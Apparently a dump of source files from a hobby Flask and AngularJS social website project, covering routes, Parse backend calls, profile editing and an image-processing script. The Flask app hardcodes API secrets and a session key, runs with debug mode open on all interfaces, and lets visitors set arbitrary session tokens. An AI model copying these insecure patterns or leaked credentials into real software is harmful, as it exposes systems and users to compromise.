{\n\t\t# \"X-Parse-Application-Id\": \"${Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4}\",\n\t\t# \"X-Parse-REST-API-Key\": \"${nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO}\",\n\t\t# \"Content-Type\": \"application/json\"\n\t\t# })\n\t\t# result = json.loads(connection.getresponse().read())\n\t\t# print result\n\t# \tsession['session_token'] = u.sessionToken\n\t# \tresp = make_response(render_template(\"index.html\"))\n\t# \treturn u.sessionToken\n\t# else:\n\t# \tif session.get('session_token') is None:\n\t# \t\tprint \"nohhh\"\n\t# \t\treturn render_template('login.html')\n\t# \telse:\n\t# \t\tprint \"yes\"\n\t# \t\treturn render_template('index.html')\n # print \"hack\"\n\treturn render_template('Error.html')\n\[email protected]('/hack404')\ndef hackathon():\n return render_template('hackathon.html')\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n\tprint path\n\treturn send_from_directory('js', path)\n\[email protected]('/assets/images/<path:path>')\ndef send_from_assets_images(path):\n print path\n return send_from_directory('assets/images', path)\n\[email protected]('/assets/javascripts/<path:path>')\ndef send_from_assets_js(path):\n print path\n return send_from_directory('assets/javascripts', path)\n\[email protected]('/assets/stylesheets/<path:path>')\ndef send_from_assets_css(path):\n print path\n return send_from_directory('assets/stylesheets', path)\n\[email protected]('/mobileLogin')\ndef mobileLogin():\n if session.get('session_token') is None:\n return render_template('mlogin.html')\n\[email protected]('/css/<path:path>')\ndef send_css(path):\n\tprint path\n\treturn send_from_directory('css', path)\n\[email protected]('/font/<path:path>')\ndef send_font(path):\n\tprint path\n\treturn send_from_directory('font', path)\n\[email protected]('/NewUpdate/<objectId>')\ndef NewUpdate(objectId):\n p = pusher.Pusher(app_id='173885',key='2f8f1cab459e648a27fd',secret='80905f147470664954bd',ssl=True,port=443)\n p.trigger('PostChannel', 'NewUpdate', {'message': objectId})\n return \"success\"\n\n\[email protected]('/images/<path:path>')\ndef send_images(path):\n\tprint path\n\treturn send_from_directory('images', path)\n\[email protected]('/Icons/<path:path>')\ndef Icons(path):\n\tprint path\n\treturn send_from_directory('Icons', path)\n\[email protected]('/logout')\ndef logout():\n\t# session.Abandon()\n\tsession.clear()\n\treturn redirect(url_for('index'))\n\ndef GetCurrentUser():\n\ttoken = session.get('session_token')\n\tsettings_local.initParse(token)\n\tme = User.current_user()\n\treturn me\n\[email protected]('/setSession/<path:path>')\ndef setSession(path):\n\tsession['session_token'] = path\n\treturn render_template('index.html')\n\[email protected]('/GetSessionToken')\ndef GetSessionToken():\n\ttoken = session.get('session_token')\n\treturn str(token)\n\[email protected]('/GetUserInterests')\ndef GetUserInterests():\n\td = []\n\tGetCurrentUser()\n\tuser_interest_function = Function(\"GetUserIntrest\")\n\td = user_interest_function()\n\treturn json.dumps(d)\n\[email protected]('/Profile')\ndef Profile():\n if session.get('session_token') != None:\n return render_template('profile.html')\n else:\n return render_template('login.html')\n\[email protected]('/Select_Interests')\ndef Select_Interests():\n if session.get('session_token') != None:\n return render_template('Settings.html')\n else:\n return render_template('login.html')\n\[email protected]('/share/<path:path>')\ndef share(path):\n SinglePost = getPost.getSinglePost(path)\n return render_template('Posts.html',SinglePost=SinglePost)\n\[email protected]('/Settings')\ndef Settings():\n\treturn render_template('Settings.html')\n\[email protected]('/download')\ndef download():\n\treturn render_template('Error.html')\n\nport = int(os.environ.get('PORT', 5000))\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\napp.run(host=\"0.0.0.0\",debug=True,port=port)\n\n\n# font images)\n\n\n#font images\n" }, { "alpha_fraction": 0.7622377872467041, "alphanum_fraction": 0.7657342553138733, "avg_line_length": 27.5, "blob_id": "62f78f3fa14a99765ef773d21b5fbdf3b23dc9b4", "content_id": "546131a2fa95f80bae1149dc9cd49eafa8c4203f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/getPost.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.datatypes import Object\nimport settings_local\n\ndef getSinglePost(objectId):\n settings_local.initParse()\n className=\"Posts\"\n Posts=Object.factory(className)\n SinglePost=Posts.Query.get(objectId=objectId)\n print SinglePost.Image1.url\n return SinglePost\n\n" }, { "alpha_fraction": 0.47630923986434937, "alphanum_fraction": 0.7057356834411621, "avg_line_length": 15.708333015441895, "blob_id": "2e3852d89487488dc8db3caa49287e45f55e1925", "content_id": "b47167c63d19da04c180e6b1b4680ddad4b8905c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 401, "license_type": "no_license", "max_line_length": 24, "num_lines": 24, "path": "/requirements.txt", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "cffi==1.5.0\ncryptography==1.2.1\nenum34==1.1.2\nFlask==0.10.1\nFlask-Triangle==0.5.4\nfunctools32==3.2.3.post2\ngunicorn==19.4.5\nidna==2.0\nipaddress==1.0.16\nitsdangerous==0.24\nJinja2==2.8\njsonschema==2.5.1\nMarkupSafe==0.23\nndg-httpsclient==0.4.0\nparse-rest==0.2.20141004\npusher==1.2.3\npyasn1==0.1.9\npycparser==2.14\npyOpenSSL==0.15.1\nrequests==2.9.1\nsix==1.10.0\nurllib3==1.14\nWerkzeug==0.11.3\nwheel==0.24.0\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 23.5, "blob_id": "cc96392561bb672e9eebef2d75d924dc4df1f923", "content_id": "83970e5afba48b22e8f45a5fa414cbdd35ac4a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 49, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "#Punchit.io website \n# Punchit.io_website_master\n" }, { "alpha_fraction": 0.5850793123245239, "alphanum_fraction": 0.58977872133255, "avg_line_length": 27.691011428833008, "blob_id": "c892e846422dea2a83ba45eb8fd14fa45a0f100e", "content_id": "9577360b647e37ea5805d8e7997d66db62a8d56a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5107, "license_type": "no_license", "max_line_length": 152, "num_lines": 178, "path": "/js/SettingsController.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "var app = angular.module('app',['app.controllers','app.factory'])\n\napp.controller(\"MainController\",function($scope){\n\n});\n\napp.controller(\"FriendsController\",['$scope','GetFacebookFriends','GetFriendsFromInterests',function($scope,GetFacebookFriends,GetFriendsFromInterests){\n var promise = GetFacebookFriends.GetFriends()\n promise.then(function(Data){\n for(var i=0;i<Data.length;i++)\n {\n if(Data[i].isFollowing)\n {\n Data[i].symbol = \"remove\"\n }\n else {\n Data[i].symbol = \"add\"\n }\n }\n $scope.FacebookFriends = Data\n })\n var promise2 = GetFriendsFromInterests.GetFriends()\n promise2.then(function(Data){\n // console.log(Data);\n $scope.intrestBasedFriends = Data\n },function(error){\n console.log(error);\n },function(update){\n //console.log(update);\n $scope.intrestBasedFriends = update\n })\n\n $scope.FollowUnfollowAction = function(d)\n {\n //console.log(d);\n\n var FollowType = Parse.Object.extend(\"FollowList\")\n var FollowObject = new FollowType();\n FollowObject.set(\"Follower\",Parse.User.current())\n User = new Parse.User();\n\t\tUser.id = d.objectId\n FollowObject.set(\"Following\",User)\n FollowObject.set(\"FollowingName\",d.Name)\n if(!d.isFollowing)\n {\n FollowObject.save({success : function(Object) {\n $scope.objectIdOfFollowObject = Object.id\n }})\n d.isFollowing = true\n d.symbol = \"remove\"\n }\n else {\n FollowObject = new FollowType();\n var Query = new Parse.Query(FollowType);\n Query.equalTo(\"Following\",User)\n Query.find({\n success:function(Objects) {\n for(var i=0;i<Objects.length;i++)\n {\n if(Objects[i].get(\"Follower\").id == Parse.User.current().id)\n {\n Objects[i].destroy()\n }\n }\n }\n })\n d.isFollowing = false\n d.symbol = \"add\"\n }\n\n }\n}])\n\napp.controller(\"InterestsController\",['$scope','FetchInterests',function($scope,FetchInterests) {\n var promise = FetchInterests.Fetch()\n promise.then(function(Data){\n $scope.Data = Data\n });\n $scope.change = function(d){\n var InterestProto = Parse.Object.extend(\"UserIntrest\")\n\n if(!d.has)\n {\n $scope.leverColor = \"red\"\n var InterestObject = new InterestProto();\n InterestObject.set(\"User\",Parse.User.current())\n var InterestList = Parse.Object.extend(\"Intrestlist\")\n var InterestListObject = new InterestList();\n InterestListObject.id = d.id;\n InterestObject.set(\"HisInterest\",InterestListObject);\n InterestObject.set(\"IntrestText\",d.Text)\n d.has = true\n d.leverColor = \"red\"\n InterestObject.save({\n success:function(Object){console.log(\"Added\");},\n error:function(){console.log(\"Error occured\");}\n })\n }\n else {\n d.has = false\n var Query = new Parse.Query(InterestProto)\n d.leverColor = \"\"\n Query.equalTo(\"User\",Parse.User.current())\n Query.find({\n success:function(response){\n for(var i=0;i<response.length;i++)\n {\n var SingleObject = response[i];\n if(SingleObject.get(\"IntrestText\") == d.Text)\n {\n SingleObject.destroy({\n error : function(error){console.log(error);}\n })\n break;\n }\n }\n },\n error : function(error)\n {\n console.log(error);\n }\n })\n }\n };\n }]);\n\napp.controller(\"EditProfileController\",function($scope){\n var user = Parse.User.current()\n $scope.Email = user.get(\"email\");\n $scope.Ninja_name = user.get(\"Ninja_name\");\n $scope.Name = user.get(\"Name\")\n //alert(user.get('ProfilePicture').url())\n $scope.image = user.get('ProfilePicture').url()\n $scope.update = function(){\n var fileUploadControl = document.getElementsByName('profilePic')[0];\n //console.log(fileUploadControl.files.length)\n if (fileUploadControl.files.length > 0) {\n var file = fileUploadControl.files[0];\n // alert(JSON.stringify(file))\n var name = \"profilePic.png\";\n var parseFile = new Parse.File(name, file);\n parseFile.save().then(function(){\n user.set(\"ProfilePicture\",parseFile);\n user.set(\"email\",$scope.Email)\n user.set(\"Ninja_name\",$scope.Ninja_name)\n user.set(\"Name\",$scope.Name)\n user.save({\n success: function(user){\n Materialize.toast('Your Profile was successfully updated', 3000);\n location.reload()\n },\n error : function(error){\n Materialize.toast(error, 2000);\n }\n });\n\n },function(){})\n }\n else {\n Materialize.toast('Please choose your Profile Picture', 2000);\n }\n }\n})\n\napp.controller(\"ChangePassword\",function($scope){\n $scope.update = function(){\n var user = Parse.User.current()\n if($scope.Pass_con == $scope.Pass_main)\n {\n user.set(\"password\",$scope.Pass_main)\n user.save({\n success : function(user){\n Materialize.toast('Password updated', 3000);\n }\n })\n }\n }\n})\n" }, { "alpha_fraction": 0.641121506690979, "alphanum_fraction": 0.7028037309646606, "avg_line_length": 88.33333587646484, "blob_id": "527b8428136f46856665a47213c052405f2929da", "content_id": "0381f979a1c73785cf3b33e2956268ad33979af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 535, "license_type": "no_license", "max_line_length": 278, "num_lines": 6, "path": "/images/logos/punchit.io_files/FkQNViGi-sj.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "/*!CK:2686195818!*//*1441808114,*/\n\nif (self.CavalryLogger) { CavalryLogger.start_js([\"tLt9Y\"]); }\n\n__d('IntlLithuanianNumberType',['IntlVariations'],function a(b,c,d,e,f,g,h){if(c.__markCompiled)c.__markCompiled();var i={getNumberVariationType:function(j){var k=j%100,l=k%10;return l===0||k>10&&k<20?h.NUMBER_DUAL:l===1?h.NUMBER_SINGULAR:h.NUMBER_PLURAL;}};f.exports=i;},null);\n__d('legacy:pages-suggest-ui-nullable',['NullableInput'],function a(b,c,d,e){if(c.__markCompiled)c.__markCompiled();b.NullableInput=c('NullableInput');},3);" }, { "alpha_fraction": 0.618453860282898, "alphanum_fraction": 0.7605984807014465, "avg_line_length": 33.869564056396484, "blob_id": "375952e502352a00b3701552bf058a0dda0bac31", "content_id": "b192365761eb3c0ac972cbb4bd4b2c288cb39484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 802, "license_type": "no_license", "max_line_length": 121, "num_lines": 23, "path": "/Process.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nfrom PIL import Image\n\nf = open('Image1.jpg', 'wb')\nurl1 = \"http://files.parsetfss.com/b7dd35dc-b01c-4492-b846-ef2a47bafc6b/tfss-0b3759e3-2265-430a-b033-f8f4421cdaab-Image1\"\nf.write(requests.get(url1).content)\nf.close()\nf1 = open('Image2.jpg', 'wb')\nurl2 = \"http://files.parsetfss.com/b7dd35dc-b01c-4492-b846-ef2a47bafc6b/tfss-0b3759e3-2265-430a-b033-f8f4421cdaab-Image1\"\nf1.write(requests.get(url2).content)\nf1.close()\nbackground = Image.open('images/Share_Pattern.jpg')\nbackground.thumbnail((300,300),Image.ANTIALIAS)\n# background.show()\nimage1 = Image.open('Image1.jpg')\nimage1.thumbnail((75,100),Image.ANTIALIAS)\n# image1.show()\nimage2 = Image.open('Image2.jpg')\nimage2.thumbnail((75,100),Image.ANTIALIAS)\nimage2.show()\nbackground.paste(image1,(40,10))\nbackground.show()\n" }, { "alpha_fraction": 0.7219731211662292, "alphanum_fraction": 0.7219731211662292, "avg_line_length": 30.85714340209961, "blob_id": "9b1e6d55b7141d3e9fff3c2996bb72b5734e33b6", "content_id": "0447e1b307e96b56b82935f03d688a58f1ffc6c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": "/settings_local.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.connection import register\ndef initParse(sessionToken=None):\n\tprint \"init\"\n\tif sessionToken == None:\n\t\tregister('Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4','nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO',master_key=None)\n\telse:\n\t\tregister('Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4','nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO',session_token=sessionToken)\n" } ]
10
clearskky/Scopus_Scrape
https://github.com/clearskky/Scopus_Scrape
2fdf0b8e8e650b749c05ef45ff6aa4a16014e6be
f0af9110c6b18a665de6f3a961d36a2d9973e10c
8914855d0900f44001c6115410a12d464e6e77a4
refs/heads/master
2021-01-26T14:33:56.923301
2020-02-27T06:41:00
2020-02-27T06:41:00
243,449,516
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5965327024459839, "alphanum_fraction": 0.6356711387634277, "avg_line_length": 49.445945739746094, "blob_id": "f1a75eb0a093308c617ec5cbbeb66dce43175435", "content_id": "7e9ff297a8056ec8f69ff0131b843b92f9c0f068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3852, "license_type": "no_license", "max_line_length": 269, "num_lines": 74, "path": "/ScopusScrape.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup #HTML sayfasını parse etmek için gereken kütüphane\r\nfrom time import sleep \r\n\r\noffset = 1 # URL'de offset parametresi sayfanın başında hangi makalenin yer alacağını belirler. Örneğin offset 41 olduğu zaman sayfada 41-60 arası makaleler listelenir.\r\npubyear = 2019\r\nscopus_1 = \"https://www.scopus.com/results/results.uri?sort=cp-f&src=s&st1=%22human-computer+interaction%22&nlo=&nlr=&nls=&sid=f65b0436cf4718bd9b60238fd65a4454&sot=b&sdt=b&sl=78&s=TITLE-ABS-KEY%28%22human-computer+interaction%22%29+AND+DOCTYPE%28ar%29+AND+PUBYEAR+%3d+\"\r\nscopus_2 = \"&cl=t&offset=\"\r\nscopus_3 = \"&origin=resultslist&ss=cp-f&ws=r-f&ps=r-f&cs=r-f&cc=10&txGid=7575ff4e603f1469d35288c9add1ab14\"\r\narticles = {}\r\n#totalArticleCount = 100\r\n\r\n\r\nhdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\r\n 'Accept-Encoding': 'none',\r\n 'Accept-Language': 'en-US,en;q=0.8',\r\n 'Connection': 'keep-alive'}\r\n\r\nfor k in range(25): #Range * 20 = Elde edilecek makale sayısı. Her sayfada 20 makale yer almakta\r\n myURL = scopus_1 + str(pubyear) + scopus_2 + str(offset) + scopus_3\r\n r = requests.post(url=myURL, headers=hdr)\r\n parsedPage = BeautifulSoup(r.text, \"lxml\")\r\n searchAreas = parsedPage.find_all(\"tr\", attrs={\"class\":\"searchArea\"})\r\n print(len(searchAreas))\r\n for i in range(len(searchAreas)):\r\n #Her makalenin belirli bazı verileri elde edilir\r\n searchArea = searchAreas[i].find(\"a\", attrs={\"class\":\"ddmDocTitle\"})\r\n docTitle = searchArea.get_text()\r\n docLink = searchArea.attrs[\"href\"]\r\n citations = searchAreas[i].find_all(\"td\", attrs={\"class\":\"textRight\"})[1].get_text()\r\n keywords = []\r\n\r\n \r\n print(str(offset+i) + \".ci makalenin sayfasından etiketler çekiliyor\")\r\n\r\n #Makalenin anahtar kelimelerini elde etmek için makalenin sayfasına gidilir\r\n try:\r\n r2 = requests.post(url=docLink, headers=hdr)\r\n parsedArticle = BeautifulSoup(r2.text, \"lxml\")\r\n #print(\"parsedArticle BeautifulSoup nesnesi oluşturuldu\")\r\n authorKeywords = parsedArticle.find(\"section\", attrs={\"id\":\"authorKeywords\"})\r\n #print(\"Keyword'lerin yer aldığı section elde edildi\")\r\n badges = authorKeywords.find_all(\"span\", attrs={\"class\":\"badges\"})\r\n #print(\"Bütün badge'ler bulundu\")\r\n keywords = []\r\n for j in range(len(badges)):\r\n keywords.append(badges[j].get_text())\r\n print(str(offset+i) +\".ci makalenin bütün anahtarlar kelimeleri elde edildi\")\r\n print(\"------------------------------------\")\r\n except:\r\n print(str(offset+i) +\".ci makalenin yazar tarafından verilen etiketleri yok ---------!!!\")\r\n print(\"------------------------------------\")\r\n \r\n \r\n #Bulgular dictionary'nin uygun alanlarına yerleştirilir\r\n \r\n articles[\"article\" + str(offset+i)] = {}\r\n articles[\"article\" + str(offset+i)][\"docTitle\"] = docTitle\r\n articles[\"article\" + str(offset+i)][\"docLink\"] = docLink\r\n articles[\"article\" + str(offset+i)][\"citations\"] = citations.strip(\"\\n\")\r\n articles[\"article\" + str(offset+i)][\"keywords\"] = keywords\r\n offset+= 20\r\nprint(\"Bütün bulgular dictionary'e yerleştirildi\")\r\n\r\n\r\n \r\nprint(\"JSON Yazım işlemleri başlıyor\")\r\nwith open(\"scopus500articles2019.json\", \"w\", encoding=\"utf-8\") as jsonFile:\r\n #json.dump(complaints, jsonFile, ensure_ascii=False).encode(\"utf8\")\r\n json.dump(articles, jsonFile)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n" }, { "alpha_fraction": 0.5679903626441956, "alphanum_fraction": 0.5848375558853149, "avg_line_length": 35.772727966308594, "blob_id": "a7185cc51872b96ff3258c2dfaeebed432fbbaf4", "content_id": "c5fa6a51e1f340a80667b8449be00010007bf756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 100, "num_lines": 22, "path": "/ScopusCitationsCounter.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import json\r\n\r\nfile = \"scopus500articles201\"\r\nfileNumber = 5\r\n\r\ncitations = {}\r\nfor i in range(5,10):\r\n targetFile = file + str(i) + \".json\"\r\n with open(targetFile, \"r\") as articles:\r\n articleData = json.load(articles)\r\n for article, data in articleData.items():\r\n year = \"201\" + str(i)\r\n if year not in citations.keys():\r\n citations[year] = int(data[\"citations\"].strip(\"\\n\").strip(\"\\t\"))\r\n else:\r\n citations[year] += int(data[\"citations\"].strip(\"\\n\").strip(\"\\t\"))\r\n \r\n\r\nwith open(\"ArticleCitationCountByYear.json\", \"w\") as destination:\r\n citations = {k: v for k, v in sorted(citations.items(), key=lambda item: item[1], reverse=True)}\r\n json.dump(citations, destination)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n" }, { "alpha_fraction": 0.5452696084976196, "alphanum_fraction": 0.5666327476501465, "avg_line_length": 35.57692337036133, "blob_id": "7678fcf76a084fa829b7d8beb39deaf3ef841672", "content_id": "5c75f464e486b21ae490f1c60dadfc80137015a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 102, "num_lines": 26, "path": "/ScopusKeywordCounter.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import json\r\n\r\nfile = \"scopus500articles201\"\r\nfileNumber = 5\r\n\r\nkeywords = {}\r\nfor i in range(5,10):\r\n targetFile = file + str(i) + \".json\"\r\n with open(targetFile, \"r\") as articles:\r\n articleData = json.load(articles)\r\n for article, data in articleData.items():\r\n for keyword in data[\"keywords\"]:\r\n if len(data[\"keywords\"]) < 1:\r\n keywords[\"noKeywords\"] += 1\r\n if keyword not in keywords:\r\n keywords[keyword] = 1\r\n else:\r\n keywords[keyword] += 1\r\n\r\n destinationFile = \"500ArticleKeywords201\" + str(i) + \".json\"\r\n with open(destinationFile, \"w\") as destination:\r\n keywords = {k: v for k, v in sorted(keywords.items(), key=lambda item: item[1], reverse=True)}\r\n json.dump(keywords, destination)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n \r\nprint(\"Bütün dosya yazım işlemleri başarıyla tamamlandı\")\r\n \r\n" } ]
3
tkys/fasttext_text_classifier
https://github.com/tkys/fasttext_text_classifier
38bcb9775f548cb634c5e26d0010bb3b737139fa
face711911dc0528c1d2959c3339847ea3dcba9e
50a11bdb92a2f74bf8ac69bfb01d6149275a8748
refs/heads/master
2020-08-08T12:20:18.556333
2019-10-09T11:25:04
2019-10-09T11:25:04
213,830,846
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4791809022426605, "alphanum_fraction": 0.4955631494522095, "avg_line_length": 20.865671157836914, "blob_id": "40ac1ce88cfe4c3a50be4e4e90a0e21f3a474317", "content_id": "8927bda9a4d0f046da97b545cca16c2c73ac0456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1601, "license_type": "no_license", "max_line_length": 88, "num_lines": 67, "path": "/train_data_fasttext.py", "repo_name": "tkys/fasttext_text_classifier", "src_encoding": "UTF-8", "text": "import csv\nimport re\nimport sys\nimport MeCab\n\n# いらない品詞(stop word)があるならばコメントアウト \nhinshi_list = [\n \"名詞\",\n \"動詞\",\n \"形容詞\",\n \"形容動詞\",\n \"記号\",\n \"助詞\",\n \"助動詞\",\n \"副詞\"\n ]\n\n\ndef convert2fasttext(bunrui):\n \"\"\" fastText用のラベルに変換 \"\"\"\n labels = {\n \"1\": \"__label__1\",\n \"2\": \"__label__2\",\n \"3\": \"__label__3\"\n #\"4\": \"__label__4\",\n #\"5\": \"__label__5\"\n }\n return labels[bunrui]\n\ndef convert2wakati(text, tagger):\n\n r=[]\n mojiretu=' '\n \"\"\" わかち書きに変換 \"\"\"\n node = tagger.parseToNode(text)\n\n while node:\n # 単語を取得\n if node.feature.split(\",\")[6] == '*':\n word = node.surface\n else:\n word = node.feature.split(\",\")[6]\n #word = node.surface\n\n # 品詞を取得\n hinshi = node.feature.split(\",\")[0]\n\n if hinshi in hinshi_list:\n r.append(word)\n node = node.next\n\n mojiretu = (' '.join(r)).strip()\n\n return mojiretu\n\ndef main():\n tagger = MeCab.Tagger('-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd')\n with open(sys.argv[1]) as file:\n reader = csv.reader(file)\n for row in reader:\n label = convert2fasttext(row[0])\n comment = convert2wakati(\"\".join(row[1:]), tagger)\n # comment = stopword(comment)\n print(\"{label}, {comment}\\n\".format(label=label, comment=comment), end=\"\")\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6632140874862671, "alphanum_fraction": 0.6782799959182739, "avg_line_length": 21.10416603088379, "blob_id": "0d0441f5dea3b2ab8ec398794a49054b4d5ca91c", "content_id": "ae553fa9424e07cacf126ddca55cce0c44686ad0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5190, "license_type": "no_license", "max_line_length": 165, "num_lines": 144, "path": "/README.md", "repo_name": "tkys/fasttext_text_classifier", "src_encoding": "UTF-8", "text": "# fasttext_text_classifier\n\n Ubuntu 18.04 LTS\n* Python 3\n* MeCab\n* mecab-python3\n* mecab-ipadic-NEologd (MeCabの新語辞書)\n* fasttext\n\n\n\n### MeCab関連の環境構築\n\nmecabインストール、neologd辞書の用意、ipadicとか\n\n```\n$ sudo apt-get install mecab libmecab-dev mecab-ipadic-utf8 git make curl xz-utils file\n\n$ pip3 install mecab-python3\n```\n\n\n## mecab-ipadic-NEologd:MeCabの新語辞書 mecab-ipadic-NEologdのインストール/更新方法\n\n辞書のシードデータは、GitHubリポジトリを介して配布されます。\n\n「git clone」し複製されたリポジトリのディレクトリに移動、\n次のコマンドで、最近のmecab-ipadic-NEologdをインストールまたは更新(上書き)できます。\n\n```\n$ git clone --depth 1 https://github.com/neologd/mecab-ipadic-neologd.git\n$ cd mecab-ipadic-neologd\n$ ./bin/install-mecab-ipadic-neologd -n\n```\n途中のメッセージからmecab-configをインストールした場合は、使用するmecab-configのパスを設定する必要があります。\n\n\n次のヘルプコマンドにてコマンドラインオプションを確認できます。\n\n```\n$ ./bin/install-mecab-ipadic-neologd -h\n```\n\n### neologd辞書の場所を確認\n```\n$ echo `mecab-config --dicdir`\"/mecab-ipadic-neologd\"\n\n/usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd\n```\n\n--------\n### fasttextの環境構築\n\nfastTextのインストールは通常`pip install fasttext `。すごく楽。\nただし今回はオートチューニングを使いたいので、最新リポジトリからもってきてインストール。\n\n```\nautotune is a new feature that is not included in the last release (0.9.1). You should install the \"dev\" version, that is, clone the repo\n\n$ git clone https://github.com/facebookresearch/fastText.git\n$ cd fastText\n$ pip install .\n\n```\n\n\n\n--------\n## fasttext用の学習用データの作成\n\n### インプットデータ用意\n\n1行に `{label},{text} `の形式で用意します\n\n* input.txt\n```\n1,変換時に、Stop Wordの処理をしたりしますが、まずはStop Word無しで学習させてみます。\n3,fastTextでクラス分けをする際の教師データは、下記のようなフォーマットなのでcsvから変換します。\n2,教師データとしてはあまり宜しくない感じはしますが、とりあえずfastTextに入力してみます。\n1,精度は、fastTextによって予測されたラベルの中の正しいラベルの数です。リコールは、すべての実際のラベルのうち、正常に予測されたラベルの数です。これをより明確にする例を見てみましょう。\n3,モデルによって予測されるラベルはですfood-safety。これは関係ありません。どういうわけか、モデルは単純な例では失敗するようです。\n```\n\n### fasttext形式ラベルと分かち書き\n以下コマンドにて、 `__label__N,(分かち書き済みテキスト)` の形式で log.txtに出力します。\n```\n$python3 train_data_fasttext.py input.csv > log.txt\n```\n\n\n### log.txt の確認\n\n```\n$cat log.txt\n__label__1, 変換 時 に 、 Stop Word の 処理 を する たり する ます が 、 Stop Word 無し で 学習 する せる て みる ます 。\n__label__3, fastText で クラス 分け を する 際 の 教師 データ は 、 下記 の よう だ フォーマット だ ので CSV から 変換 する ます 。\n__label__2, 教師 データ として は あまり 宜しい ない 感じ は する ます が 、 とりあえず fastText に 入力 する て みる ます 。\n__label__1, 精度 は 、 fastText によって 予測 する れる た ラベル の 中 の 正しい ラベル の 数 です 。 リコール は 、 すべて の 実際 の ラベル の うち 、 正常 に 予測 する れる た ラベル の 数 です 。 これ を より 明確 に する 例 を 見る て みる ます う 。\n__label__3, モデル によって 予測 する れる ラベル は です Food - safety 。 これ は 関係 ある ます ん 。 わけ か 、 モデル は 単純 だ 例 で は 失敗 する よう です 。\n\n```\n\n### train_data_fasttext.py でのMeCabの分かち書き挙動とfasttext形式ラベル付けの対応\n\n* 抽出する品詞の指定\n```\n# いらない品詞があるならばコメントアウト\nhinshi_list = [\n \"名詞\",\n \"動詞\",\n \"形容詞\",\n \"形容動詞\",\n \"記号\",\n \"助詞\",\n \"助動詞\",\n \"副詞\"\n ]\n```\n\n* MeCabの辞書(mecab-ipadic-neologd)のpath指定\n```\n tagger = MeCab.Tagger('-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd')\n```\n\n\n\n* fasttext形式でのラベル付け対応\n\n```\ndef convert2fasttext(bunrui):\n \"\"\" fastText用のラベルに変換 \"\"\"\n labels = {\n \"1\": \"__label__1\",\n \"2\": \"__label__2\",\n \"3\": \"__label__3\"\n #\"4\": \"__label__4\",\n #\"5\": \"__label__5\"\n }\n return labels[bunrui]\n```\nここではinput.csvの要素1列目の{label}が 1,2,3 でラベルしてあるケースとしています\n\n\n--------\n\n\n\n" } ]
2
Terairk/WEconnect
https://github.com/Terairk/WEconnect
175f5fca3073b31d0011edf77bd46ef41b12f393
4bbadc6cdbd9b2b477ecb742c98bf98abefcd0c5
56ff0a3909ed366afd4891d59fa23b432858118d
refs/heads/master
2022-12-12T23:50:29.333522
2020-09-19T00:32:48
2020-09-19T00:32:48
296,277,259
0
1
null
null
null
null
null
